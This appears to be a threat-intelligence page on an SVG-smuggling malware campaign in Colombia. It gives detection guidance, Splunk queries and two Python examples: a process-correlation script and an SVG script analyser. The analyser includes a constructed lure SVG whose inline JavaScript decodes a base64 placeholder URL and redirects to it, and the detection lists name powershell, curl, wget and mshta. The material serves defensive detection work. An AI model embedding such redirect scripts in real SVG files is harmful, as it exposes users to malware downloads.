AI Code Insight Unmasks Hidden Colombian SVG Malware Lure

Tags: Colombian Malware, SVG Threats, AI Threat Detection
Investigators found a wave of malware in Colombia hidden in everyday SVG files. Behind clean visuals, the attackers concealed scripts that fetched harmful ZIP payloads. They masked their work with phishing tricks and even faked legal symbols to appear trustworthy. AI code analysis peeled back these layers, showing how simple graphics carried complex threats.

Indicators of Compromise

No domains found for this campaign

Campaign Guidance

Remediation, mitigation, notes, history and related intelligence

REMEDIATION


T1027.017 Obfuscated Files or Information: SVG Smuggling


ID: DS0022
Data Source: File
Data Component: File Creation
Detects: Monitor for files newly written to disk by JavaScript running inside an opened SVG. Writing rules for every variant is difficult because attackers combine different encoding and encryption schemes, so consider monitoring any file downloaded from the Internet (possibly via SVG Smuggling) for suspicious follow-on activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities.

SVG Smuggling is often chained:

  • .svg downloaded → parsed or executed by browser/email client

  • Drops or references a secondary payload (HTML/JS/Payload)

  • Follow-on execution with powershell, cmd, wscript, etc.

Analytic 1 - Detect malicious use of SVG files embedded with script tags to assemble, download, or redirect to payloads.

index=* (sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" OR sourcetype="linux_audit" OR sourcetype="osquery")
(file_name="*.svg" OR file_path="*\\Downloads\\*.svg" OR file_path="/tmp/*.svg" OR file_path="/Users/*/Downloads/*.svg")
| join type=inner file_path [ search index=* process_name IN ("powershell.exe", "wscript.exe", "cmd.exe", "mshta.exe", "bash", "curl", "wget") | stats min(_time) as proc_time by file_path, process_name, host ]
| eval time_diff=proc_time - _time
| where time_diff >= 0 AND time_diff < 120
| table _time, host, user, file_path, file_name, process_name, command_line, time_diff
| sort _time
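The same temporal correlation that Analytic 1 expresses in SPL, written out as a stand-alone script so the logic can be tested offline. This is an added example, not part of the original campaign page or of MITRE's analytic; the event records are constructed, the hostnames, paths and timestamps are invented, and the 120-second window and the process list are taken from the query above.

```python
from datetime import datetime

WINDOW_SECONDS = 120  # same window as Analytic 1
FOLLOW_ON = {"powershell.exe", "wscript.exe", "cmd.exe", "mshta.exe", "bash", "curl", "wget"}

# Constructed telemetry (not real events): a mix of .svg file creations and process starts.
EVENTS = [
    {"time": "2024-05-01T10:00:00", "host": "ws01", "type": "file_create",
     "path": r"C:\Users\ana\Downloads\factura.svg"},
    {"time": "2024-05-01T10:00:45", "host": "ws01", "type": "process",
     "name": "powershell.exe", "cmdline": "[constructed command line]"},
    {"time": "2024-05-01T10:05:00", "host": "ws01", "type": "process",
     "name": "cmd.exe", "cmdline": "[constructed command line]"},        # outside window
    {"time": "2024-05-01T09:59:50", "host": "ws02", "type": "process",
     "name": "wscript.exe", "cmdline": "[constructed command line]"},    # before the file existed
    {"time": "2024-05-01T10:00:10", "host": "ws02", "type": "file_create",
     "path": "/Users/luis/Downloads/logo.svg"},
    {"time": "2024-05-01T10:00:30", "host": "ws02", "type": "process",
     "name": "chrome.exe", "cmdline": "[constructed command line]"},     # not a follow-on interpreter
    {"time": "2024-05-01T10:00:20", "host": "ws03", "type": "process",
     "name": "curl", "cmdline": "[constructed command line]"},           # no .svg on this host
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def correlate(events, window=WINDOW_SECONDS):
    """Pair each .svg creation with follow-on interpreter/downloader starts
    on the same host that occur 0 <= delta < window seconds later."""
    svg_creates = [e for e in events
                   if e["type"] == "file_create" and e["path"].lower().endswith(".svg")]
    hits = []
    for proc in events:
        if proc["type"] != "process" or proc["name"].lower() not in FOLLOW_ON:
            continue
        for fc in svg_creates:
            if fc["host"] != proc["host"]:
                continue
            delta = (_ts(proc) - _ts(fc)).total_seconds()
            if 0 <= delta < window:
                hits.append({"host": proc["host"], "file": fc["path"],
                             "process": proc["name"], "delta_seconds": int(delta),
                             "time": proc["time"]})
    return sorted(hits, key=lambda h: h["time"])


if __name__ == "__main__":
    for h in correlate(EVENTS):
        print(f'{h["time"]} {h["host"]} {h["process"]} started {h["delta_seconds"]}s after {h["file"]}')
```

As with the SPL version, a hit is only a lead: a user opening an SVG and then launching a shell within two minutes is common enough that the result should be enriched with the process command line and parent before it is escalated.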

Analytic 2 - Suspicious JavaScript or Obfuscation in SVG

file_name="*.svg"
| rex field=_raw ""
| search js_payload="*eval*" OR js_payload="*atob*" OR js_payload="*window.location*" OR js_payload="*document.write*"
| table _time, file_name, js_payload
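A content-level check that complements Analytic 2: instead of matching raw log text, it parses the SVG, pulls out every inline script body and event-handler attribute, decodes any long base64 blob it finds, and looks for the same indicators the query above uses. This is an added example, not the page's or MITRE's code; the two SVG samples are constructed, the URL inside the base64 blob is a placeholder on the reserved `.invalid` domain, and the extra indicators (event attributes, a decoded URL) go slightly beyond the query to show where lures hide script outside a `<script>` element.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Indicators mirrored from Analytic 2 on the page.
SUSPICIOUS_TOKENS = ("eval", "atob", "window.location", "document.write")
# Event attributes that also carry script in an SVG (assumed set, not from the page).
EVENT_ATTRS = ("onload", "onclick", "onerror", "onmouseover")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)


def extract_scripts(svg_text):
    """Return inline script bodies and event-handler values from an SVG.
    Falls back to a regex when the XML is malformed, which lure files often are."""
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError:
        return SCRIPT_RE.findall(svg_text)
    found = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # drop the {namespace} prefix
        if tag == "script" and el.text:
            found.append(el.text)
        for attr, val in el.attrib.items():
            if attr.lower() in EVENT_ATTRS:
                found.append(val)
    return found


def decode_b64_blobs(js):
    """Decode every long base64-looking run; ignore anything that is not valid base64."""
    decoded = []
    for blob in B64_RE.findall(js):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except (ValueError, base64.binascii.Error):
            pass
    return decoded


def analyse_svg(svg_text):
    scripts = extract_scripts(svg_text)
    hits = set()
    for js in scripts:
        hits.update(tok for tok in SUSPICIOUS_TOKENS if tok in js)
        for plain in decode_b64_blobs(js):
            hits.update("b64:" + tok for tok in SUSPICIOUS_TOKENS if tok in plain)
            if re.search(r"https?://", plain):
                hits.add("b64:url")
    return {"script_count": len(scripts), "indicators": sorted(hits), "suspicious": bool(hits)}


# Constructed samples. The second mimics the shape of a smuggling lure: clean visual text,
# a base64-wrapped placeholder URL, and a redirect performed from inline script.
BENIGN_SVG = ('<svg xmlns="http://www.w3.org/2000/svg" width="100" height="100">'
              '<circle cx="50" cy="50" r="40" fill="navy"/></svg>')

_B64_URL = base64.b64encode(b"https://example.invalid/archive.zip").decode()
SMUGGLING_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg" width="200" height="100">
  <text x="10" y="50">Documento legal</text>
  <script type="text/javascript"><![CDATA[
    var u = atob("{_B64_URL}");
    window.location.href = u;
  ]]></script>
</svg>"""

if __name__ == "__main__":
    for name, doc in (("benign", BENIGN_SVG), ("lure", SMUGGLING_SVG)):
        print(name, analyse_svg(doc))
```

Run over a mail gateway's quarantined attachments or a proxy's download log, the `indicators` list gives an analyst the same context as the `js_payload` column in Analytic 2, plus what the base64 actually decoded to, which is usually the fastest way to tell a redirect lure from a legitimate animated graphic.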

Observed Countries (1)

CO (501)